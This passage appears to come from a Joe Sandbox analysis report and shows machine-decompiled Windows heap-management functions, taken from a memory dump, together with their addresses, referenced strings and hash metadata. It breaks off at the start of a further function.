				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0183D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x18d8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E018296E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01893C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E018296E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E017EB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E018A14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01807D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E018A1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01807D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E018A1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                        0x0181ac85
                                                        0x0181ac88
                                                        0x0181ac8a
                                                        0x0181ac8d
                                                        0x0181ac91
                                                        0x0181ac99
                                                        0x0181ac9c
                                                        0x01859f57
                                                        0x01859f5b
                                                        0x01859f60
                                                        0x01859f60
                                                        0x0181aca8
                                                        0x0181acae
                                                        0x0181acda
                                                        0x0181acde
                                                        0x0181ace8
                                                        0x0181aceb
                                                        0x0181acee
                                                        0x00000000
                                                        0x0181acee
                                                        0x0181acf6
                                                        0x0181acb0
                                                        0x0181acb0
                                                        0x0181acbb
                                                        0x0181acbd
                                                        0x0181acc0
                                                        0x0181acc5
                                                        0x0181adae
                                                        0x0181adb4
                                                        0x0181adb4
                                                        0x0181acd4
                                                        0x0181acd8
                                                        0x0181acf9
                                                        0x0181acff
                                                        0x0181ad04
                                                        0x0181ad08
                                                        0x0181ad09
                                                        0x0181ad10
                                                        0x0181ad12
                                                        0x0181ad18
                                                        0x01859f6f
                                                        0x01859f74
                                                        0x01859f76
                                                        0x01859f7c
                                                        0x01859f84
                                                        0x01859f88
                                                        0x01859f89
                                                        0x01859f90
                                                        0x01859f90
                                                        0x01859f76
                                                        0x0181ad1e
                                                        0x0181ad24
                                                        0x0181ad26
                                                        0x0185a097
                                                        0x0185a09b
                                                        0x0185a0ba
                                                        0x0185a0bf
                                                        0x0185a09d
                                                        0x0185a0b2
                                                        0x0185a0b7
                                                        0x0185a0c5
                                                        0x0185a0c8
                                                        0x0185a0cb
                                                        0x0185a0d2
                                                        0x00000000
                                                        0x0181ad2c
                                                        0x0181ad2c
                                                        0x0181ad2f
                                                        0x0181ad34
                                                        0x0181ad36
                                                        0x01859f97
                                                        0x01859f9a
                                                        0x00000000
                                                        0x00000000
                                                        0x01859fa9
                                                        0x0181ad3e
                                                        0x0181ad3e
                                                        0x0181ad41
                                                        0x01859fb3
                                                        0x01859fb9
                                                        0x01859fc0
                                                        0x01859fd0
                                                        0x01859fd0
                                                        0x01859fc0
                                                        0x0181ad4a
                                                        0x0181ad50
                                                        0x0181ad5c
                                                        0x0181ad62
                                                        0x0181ad68
                                                        0x0181ad6b
                                                        0x0181ad6d
                                                        0x01859fda
                                                        0x01859fdd
                                                        0x00000000
                                                        0x00000000
                                                        0x01859fec
                                                        0x00000000
                                                        0x0181ad73
                                                        0x0181ad73
                                                        0x0181ad73
                                                        0x0181ad75
                                                        0x0181ad75
                                                        0x0181ad78
                                                        0x01859ff6
                                                        0x01859ffc
                                                        0x0185a003
                                                        0x0185a00e
                                                        0x0185a010
                                                        0x0185a01b
                                                        0x0185a01b
                                                        0x0185a01b
                                                        0x0185a038
                                                        0x0185a038
                                                        0x0185a003
                                                        0x0181ad84
                                                        0x0181ad89
                                                        0x0181ad8c
                                                        0x0181ad8e
                                                        0x0185a042
                                                        0x0185a045
                                                        0x00000000
                                                        0x00000000
                                                        0x0185a054
                                                        0x00000000
                                                        0x0181ad94
                                                        0x0181ad94
                                                        0x0181ad94
                                                        0x0181ad96
                                                        0x0181ad96
                                                        0x0181ad99
                                                        0x0185a063
                                                        0x0185a065
                                                        0x0185a070
                                                        0x0185a070
                                                        0x0185a070
                                                        0x0185a08d
                                                        0x0185a08d
                                                        0x0181ada4
                                                        0x0181ada6
                                                        0x00000000
                                                        0x0181ada6
                                                        0x0181ad8e
                                                        0x0181ad6d
                                                        0x0181ad3c
                                                        0x0181ad3c
                                                        0x00000000
                                                        0x0181ad3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0181acd8

                                                        Strings
                                                        • HEAP: , xrefs: 0185A0BA
                                                        • HEAP[%wZ]: , xrefs: 0185A0AD
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0185A0CD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        • Opcode ID: 1ca4cad3c395e9cec7397fa3782669a0e486bf6872972ede1570624751d43783
                                                        • Instruction ID: 070e49899619ae480755ca50955ba39e404496199fe8dc7a8f1f301f55aa5fd0
                                                        • Opcode Fuzzy Hash: 1ca4cad3c395e9cec7397fa3782669a0e486bf6872972ede1570624751d43783
                                                        • Instruction Fuzzy Hash: 9F81F672601A85EFE72ACBACC894BA9BBF8FF04714F0441A5E941C7696D774EB40CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018923E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E018923E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x18d874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x18d874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0183D4F0(_t83, 0x17c6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E017EB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x18d6378 = 1;
						asm("int3");
						 *0x18d6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                        0x018923e3
                                                        0x018923e8
                                                        0x018923eb
                                                        0x018923ee
                                                        0x018923f3
                                                        0x0189259b
                                                        0x0189259b
                                                        0x0189259d
                                                        0x018925a3
                                                        0x018925a3
                                                        0x018923fb
                                                        0x01892424
                                                        0x0189244f
                                                        0x01892460
                                                        0x01892451
                                                        0x01892451
                                                        0x01892456
                                                        0x01892458
                                                        0x01892458
                                                        0x0189245b
                                                        0x0189245b
                                                        0x01892426
                                                        0x01892431
                                                        0x01892436
                                                        0x01892443
                                                        0x01892438
                                                        0x01892438
                                                        0x01892438
                                                        0x01892445
                                                        0x01892445
                                                        0x01892463
                                                        0x01892469
                                                        0x0189246f
                                                        0x01892480
                                                        0x01892495
                                                        0x018924a1
                                                        0x018924ce
                                                        0x018924df
                                                        0x018924d0
                                                        0x018924d0
                                                        0x018924d5
                                                        0x018924d7
                                                        0x018924d7
                                                        0x018924da
                                                        0x018924da
                                                        0x018924a3
                                                        0x018924b0
                                                        0x018924b5
                                                        0x018924c2
                                                        0x018924b7
                                                        0x018924b7
                                                        0x018924b7
                                                        0x018924c4
                                                        0x018924c4
                                                        0x018924e8
                                                        0x01892497
                                                        0x0189249a
                                                        0x0189249a
                                                        0x01892482
                                                        0x01892488
                                                        0x01892488
                                                        0x01892471
                                                        0x01892479
                                                        0x01892479
                                                        0x018924ef
                                                        0x018923fd
                                                        0x01892401
                                                        0x01892412
                                                        0x01892403
                                                        0x01892403
                                                        0x01892408
                                                        0x0189240a
                                                        0x0189240a
                                                        0x0189240d
                                                        0x0189240d
                                                        0x0189241b
                                                        0x0189241b
                                                        0x018924f1
                                                        0x018924f6
                                                        0x01892507
                                                        0x01892510
                                                        0x00000000
                                                        0x01892510
                                                        0x0189250b
                                                        0x00000000
                                                        0x018924f8
                                                        0x018924f8
                                                        0x018924fc
                                                        0x01892500
                                                        0x01892512
                                                        0x01892515
                                                        0x0189251a
                                                        0x01892521
                                                        0x01892524
                                                        0x01892529
                                                        0x0189252f
                                                        0x00000000
                                                        0x00000000
                                                        0x0189253c
                                                        0x0189255c
                                                        0x01892561
                                                        0x0189253e
                                                        0x01892554
                                                        0x01892559
                                                        0x0189256a
                                                        0x0189256d
                                                        0x01892574
                                                        0x01892586
                                                        0x01892588
                                                        0x0189258f
                                                        0x01892590
                                                        0x01892590
                                                        0x01892597
                                                        0x00000000
                                                        0x01892597

                                                        Strings
                                                        • HEAP: , xrefs: 0189255C
                                                        • HEAP[%wZ]: , xrefs: 0189254F
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0189256F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        • API String ID: 0-3815128232
                                                        • Opcode ID: 42393e0f86b5d268311f76b5619942a9998a53c22680b2dd0f23126031ddcc95
                                                        • Instruction ID: 20101658c9ead2d45bbe9014cf44eb69ef39f2d170443e26b416f44388c92a51
                                                        • Opcode Fuzzy Hash: 42393e0f86b5d268311f76b5619942a9998a53c22680b2dd0f23126031ddcc95
                                                        • Instruction Fuzzy Hash: E251F334100254AAEB74DE1EC8D4772BBF3EB48748F59485DF8C2CB285D235DA46DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180EB9A Relevance: 3.9, Strings: 3, Instructions: 156COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E0180EB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t7 = _t127 - 8; // -8
					_t91 = _t7;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							E0189FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E0180BC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E0180E4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0x18d8748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E017EB150();
								__eflags =  *0x18d7bc8;
								if(__eflags == 0) {
									__eflags = 1;
									E018A2073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}


























                                                        0x0180eb9a
                                                        0x0180eba5
                                                        0x0180eba7
                                                        0x0180ebaa
                                                        0x0180ebb3
                                                        0x0180eca0
                                                        0x0180eca1
                                                        0x0180eca5
                                                        0x0180ecd1
                                                        0x0180ecd1
                                                        0x0180ecaa
                                                        0x0180ecc3
                                                        0x0180ecc9
                                                        0x0180ecc9
                                                        0x0180ebb9
                                                        0x0180ebbf
                                                        0x0180ebc2
                                                        0x0180ebc2
                                                        0x0180ebc2
                                                        0x0180ebc7
                                                        0x00000000
                                                        0x00000000
                                                        0x0180ebd1
                                                        0x0180ebd1
                                                        0x0180ebd4
                                                        0x0180ebd9
                                                        0x0180ebdd
                                                        0x0180ebe9
                                                        0x0180ebf0
                                                        0x01854258
                                                        0x0185425e
                                                        0x0185425e
                                                        0x0180ebf6
                                                        0x0180ebf6
                                                        0x0180ebf9
                                                        0x0180ebfc
                                                        0x0180ebfe
                                                        0x0180ec01
                                                        0x0180ec01
                                                        0x0180ec04
                                                        0x00000000
                                                        0x00000000
                                                        0x0180ec0a
                                                        0x0180ec0e
                                                        0x0180ec11
                                                        0x0180ec14
                                                        0x0180ec8f
                                                        0x0180ec92
                                                        0x00000000
                                                        0x0180ec92
                                                        0x0180ec1a
                                                        0x0180ec1d
                                                        0x0180ec20
                                                        0x0180ec72
                                                        0x0180ec75
                                                        0x0180ec77
                                                        0x0180ec77
                                                        0x0180ec78
                                                        0x0180ec7a
                                                        0x0180ec7a
                                                        0x0180ec83
                                                        0x0180ec83
                                                        0x0180ec32
                                                        0x0180ec3e
                                                        0x01854281
                                                        0x01854284
                                                        0x01854286
                                                        0x0185428c
                                                        0x01854290
                                                        0x018542af
                                                        0x018542b4
                                                        0x01854292
                                                        0x018542a7
                                                        0x018542ac
                                                        0x018542ba
                                                        0x018542bf
                                                        0x018542c4
                                                        0x018542cc
                                                        0x018542d0
                                                        0x018542d1
                                                        0x018542d1
                                                        0x018542cc
                                                        0x018542d6
                                                        0x018542d6
                                                        0x0180ec44
                                                        0x0180ec4b
                                                        0x0180ec55
                                                        0x0180ec5b
                                                        0x0180ec5b
                                                        0x0180ec5d
                                                        0x0180ec60
                                                        0x00000000
                                                        0x0180ec60
                                                        0x0180ec8a
                                                        0x00000000
                                                        0x0180ec8a
                                                        0x0180ec71

                                                        Strings
                                                        • HEAP: , xrefs: 018542AF
                                                        • HEAP[%wZ]: , xrefs: 018542A2
                                                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 018542BA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                        • API String ID: 0-1596344177
                                                        • Opcode ID: 777930b6606dcd9a84f17ef74835d596c6f91b61d856104b7687168fc716de4b
                                                        • Instruction ID: 5e106ad5cabf0628bfdfb36a42a63a6a29f4ffe28f5c4425e8d09f8d9b040a60
                                                        • Opcode Fuzzy Hash: 777930b6606dcd9a84f17ef74835d596c6f91b61d856104b7687168fc716de4b
                                                        • Instruction Fuzzy Hash: 2D510E31A10529EFCB59DF58C884A6ABBF1FF84314F1584A9E805DB382D731EE42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E0180B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x18d8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E017EB150();
						} else {
							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E017EB150();
						__eflags =  *0x18d7bc8;
						if(__eflags == 0) {
							E018A2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0180AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                        0x0180b8f0
                                                        0x0180b8f2
                                                        0x0180b8f4
                                                        0x01852c4e
                                                        0x01852c50
                                                        0x01852c56
                                                        0x01852c5c
                                                        0x01852c60
                                                        0x01852c7f
                                                        0x01852c84
                                                        0x01852c62
                                                        0x01852c77
                                                        0x01852c7c
                                                        0x01852c8a
                                                        0x01852c8f
                                                        0x01852c94
                                                        0x01852c9c
                                                        0x01852ca5
                                                        0x01852ca5
                                                        0x01852c9c
                                                        0x01852c50
                                                        0x0180b8fa
                                                        0x0180b902
                                                        0x0180b921
                                                        0x0180b921
                                                        0x0180b924
                                                        0x0180b924
                                                        0x0180b927
                                                        0x00000000
                                                        0x00000000
                                                        0x0180b929
                                                        0x0180b92b
                                                        0x0180b92d
                                                        0x0180b940
                                                        0x00000000
                                                        0x0180b940
                                                        0x0180b932
                                                        0x0180b932
                                                        0x00000000
                                                        0x0180b932
                                                        0x00000000
                                                        0x0180b904
                                                        0x0180b904
                                                        0x0180b90a
                                                        0x0180b90c
                                                        0x0180b916
                                                        0x0180b919
                                                        0x0180b915
                                                        0x0180b915
                                                        0x0180b91b
                                                        0x0180b91b
                                                        0x00000000
                                                        0x0180b910

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        • Opcode ID: 80e3f99969b71dbd950b07d4b9100d4ffacf313df9073783129214ea460c35e5
                                                        • Instruction ID: 1951b20953e04ffd9643453a6dfb708b24ddbe76035a49dcc84ba7d3013b0e1e
                                                        • Opcode Fuzzy Hash: 80e3f99969b71dbd950b07d4b9100d4ffacf313df9073783129214ea460c35e5
                                                        • Instruction Fuzzy Hash: 9311D33531560A9FD7AAD71DC894B35F7A6EB40B24F14852DE40ACB395EA30DB40C741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018AE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E018AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
